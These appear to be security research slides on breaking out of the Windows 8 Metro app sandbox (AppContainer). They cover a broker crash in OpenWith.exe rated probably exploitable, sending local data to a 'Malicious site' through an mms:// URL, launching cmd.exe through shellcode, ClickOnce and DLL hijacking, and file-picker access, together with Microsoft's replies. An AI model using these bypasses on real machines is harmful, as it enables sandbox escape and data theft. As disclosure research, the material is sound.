Code shown over the same map on the next slide (JavaScript, calling the launcher with the application picker):

savePicker.pickSaveFileAsync().then(function (file) {
    if (file) {
        var options = new Windows.System.LauncherOptions();
        options.displayApplicationPicker = true;
        Windows.System.Launcher.launchFileAsync(file, options);
    }
});
























Discovered an Issue of a Broker Process

• OpenWith.exe (memory corruption)

[Screenshot: "Pick an app" crash dialog from Windows Error Reporting: "Do you want to send more information about the problem? Additional details about what went wrong can help Microsoft create a solution." (Hide Details / Send information / Cancel). Files that help describe the problem: C:\Users\User\AppData\Local\Temp\WERAFE2.tmp.hdmp. Read our privacy statement online: http://go.microsoft.com/fwlink/?linkid=190175]



[Screenshot: Process Explorer (UserPC\User) with the Integrity column: WWAHost.exe 1764 Suspended "Microsoft WWA Host" (AppContainer), RuntimeBroker.exe 2172 "Runtime Broker" (Medium), wkspbroker.exe 1352 "Remote App and Desktop Co…" (Medium), ImeBroker.exe 1652 "Microsoft IME 2012" (Medium), WmiPrvSE.exe 1056 "WMI Provider Host" (System), WWAHost.exe 2143 Suspended (AppContainer), OpenWith.exe 2264 "Pick an app" (Medium), WmiPrvSE.exe 2512 (System), TiWorker.exe 692 "Windows Modules Installer …" (System). Lower pane: DLLs loaded by OpenWith.exe, including actxprxy.dll "ActiveX Interface Marshaling Library", advapi32.dll "Advanced Windows 32 Base API", atl.dll "ATL Module for Windows XP (Unicode)", bcryptprimitives.dll "Windows Cryptographic Primitives Library", …]




































































[Screenshot: WinDbg !exploitable output for the OpenWith.exe crash (user-mode live debuggee, second-chance exception). Faulting instruction: a `push eax` followed by an indirect `call dword ptr [ecx+…]` whose ecx operand and the stack contents are tainted. Description: "Data from Faulting Address controls Code Flow". Short Description: TaintedDataControlsCodeFlow. Exploitability Classification: PROBABLY_EXPLOITABLE. Recommended Bug Title: "Probably Exploitable - Data from Faulting Address controls Code Flow at …" (rest illegible). Explanation: "The data from the faulting address is later used as the target for a branch." The stack ends in kernel32!BaseThreadInitThunk+0xe, ntdll!__RtlUserThreadStart+0x…, ntdll!_RtlUserThreadStart+0x1e.]






















ATTACK DESIGN LOGIC

BYPASS INTERNET C=ONNECTION



















Bypass Internet Connection Limitation 



















MSRC:

"Such undesirable activities are highly detectable by either users or the AV industry, and once reported to Microsoft, we have the ability to remove the offending app from all user machines, thus protecting Windows 8 users."


Bypass Internet Connection Limitation

[Figure: a Metro app with no Internet capability (1) accesses local sensitive information, then (2) reaches the malicious site with mms://Malicious site/information?data=ab41962ab.]









BYPASS LAUNCH PROGRAM LIMITATION










Inline ASM and Shellcode

[Screenshot: Process Explorer (UserPC\User) showing the test Metro app AppC.exe (AppContainer) with a child cmd.exe "Windows Command …" (AppContainer) and conhost.exe "Console Window Host" (AppContainer), alongside svchost.exe (System), dllhost.exe "COM Surrogate" (Medium), RuntimeBroker.exe (Medium) and ImeBroker.exe "Microsoft IME 2012" (Medium). The handle pane for cmd.exe lists an ALPC Port under \Sessions\1\A…, the \Default desktop, the \KnownDlls directory, a directory under \Sessions\1\…, files under C:\Users\User\… and C:\Windows\S…, \Device\CNG, and keys under HKLM\SYSTEM, HKLM\SOFTWARE, HKCU\Software, HKCU, HKCR\Activat… and an RPC Control\OLEB2A63E2B2B9972E45FDB endpoint. Evaluation copy, build 82…]

[Screenshot: the cmd.exe started inside the AppContainer, at …rs\User\Documents\Visual Studio 11\Projects\AppC\Debug\AppC\AppX>, running forfiles to list the package directory (…exe, …pdb, …winmd, …anifest.xml, …Page.xaml, …soft-system-package.metadata, …rces.pri, …pxrecipe); "cd .." is answered with "…is denied."]


















































ClickOnce package (.Application/.xbap) is executable


Screenshot: ClickOnce "Application Install - Security Warning" dialog. "Publisher cannot be verified. Are you sure you want to install this application?" Name: click. From (hover over the string below to see the full domain): 10.1.144.115. Publisher: Unknown Publisher. Buttons: Install / Don't Install. Footer: "While applications from the Internet can be useful, they can potentially harm your computer. If you do not trust the source, do not install this software. More Information"


































DLL Hijacking 





Screenshot: Process Explorer (Win8\User, taskbar clock 3:06 AM 6/20/2012) with the DLL pane open. The process list includes vmtoolsd.exe, regedit.exe, oleview.exe, cmd.exe, conhost.exe, procexp.exe, COMRaider.exe, notepad.exe, devenv.exe (Microsoft Visual Studio 2012), MSBuild.exe, mmc.exe and iexplore.exe (Integrity: Low). In the DLL pane every Microsoft module (rpcrt4.dll, rsaenh.dll, sechost.dll, secur32.dll, setupapi.dll, SHCore.dll, shell32.dll, shlwapi.dll, sqmapi.dll, sspicli.dll, urlmon.dll, user32.dll, uxtheme.dll, winhttp.dll, wininet.dll, winnsi.dll, ws2_32.dll; versions 6.2.8400.0 / 10.0.8400.0) is loaded from C:\Windows\System32 or C:\Program Files\Internet Explorer, whereas traceextn.dll, with no description, company name or version, is loaded from C:\Users\User\Desktop\traceextn.dll.
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MICRO' 


MSRC:

(ClickOnce) ClickOnce problem will be fixed in next Windows 8 release.

(DLL Hijacking) We would consider this type of exploit a vulnerability in the desktop applications rather than a vulnerability in the metro app or the platform. We continue to address DLL hijacking bugs in security updates as detailed in our security advisory for Insecure Library loading.
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MICRO" 


BYPASS FILE/FOLDER ACCESS 

















Demo 
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FilePicker 


PickerHost.exe (the broker process)

- The broker process

- Runs with Medium permission

- Used when the user needs to save or read files in a specific folder that is not covered by the app's capability settings.

Even if you did not grant file system access to the app, the app can still call SavePickFile/PickFolder to let the user choose the folders they want it to access, for example to save a file in a user-specified folder.

After the user clicks OK, the app has full control of that folder with the broker's permission.
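As an added illustration (not code from the slides) of what the picker dialog actually grants: a Metro style app whose manifest declares no library or removable-storage capability can still enumerate, create and delete inside whichever folder the user picks, because PickerHost.exe hands the AppContainer a brokered handle. The WinRT types used are the standard FolderPicker and StorageFolder APIs; the probe file name is constructed for the example.

```csharp
using System;
using System.Threading.Tasks;
using Windows.Storage;
using Windows.Storage.Pickers;

// Added example. Assumption: the app manifest lists NO capabilities at all,
// so the AppContainer cannot open any user folder on its own. The only thing
// that widens its reach is the user's click in the picker, which runs in the
// Medium-integrity broker PickerHost.exe.
public static class PickerAccessDemo
{
    // Show the folder picker; returns null if the user cancels.
    public static async Task<StorageFolder> AskUserForFolderAsync()
    {
        var picker = new FolderPicker
        {
            SuggestedStartLocation = PickerLocationId.Desktop,
            ViewMode = PickerViewMode.List
        };
        picker.FileTypeFilter.Add("*");
        return await picker.PickSingleFolderAsync();
    }

    // After OK, the app holds read/write/delete rights on the chosen tree
    // without any manifest capability. Returns the number of files seen.
    public static async Task<int> ShowAccessScopeAsync(StorageFolder folder)
    {
        if (folder == null) return -1;                     // user cancelled

        var files = await folder.GetFilesAsync();          // read: full listing
        var probe = await folder.CreateFileAsync(
            "picker_access_probe.txt",                     // constructed name
            CreationCollisionOption.ReplaceExisting);      // write: new file
        await FileIO.WriteTextAsync(probe, "written from inside AppContainer");
        await probe.DeleteAsync();                          // delete: clean up
        return files.Count;
    }
}
```

The dialog text never says "grants the app read, write and delete access to this folder tree", which is the gap the Conclusion slides ask about.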


Screenshot: the Metro folder picker ("Files - Desktop", Go up, Sort by name) showing Desktop entries such as Bubbles2, bypass_APPContainer6, ollydbg and bypass_APPContainer under the Libraries / User / Computer navigation, with a Cancel button.






MSRC:

This is a deliberate feature, and fully under the user's control. Users should not click "ok" to the File picker dialog if they do not want the app to have access to that folder tree. We consider this under the user's control and as such do not view it as a threat.


Conclusion

• Introduced

- Security design of AppContainer

- The methodology of Metro style app vulnerability discovery

- The issues we have discovered

• Security vs. convenience: a never-solved problem?

• Do users really know what will happen after clicking 'OK'?


Thanks! 


http://exploitspace.blogspot.com/ 


Contact: (nanika_pan | tt_tsai)@trend\.com\.tw 


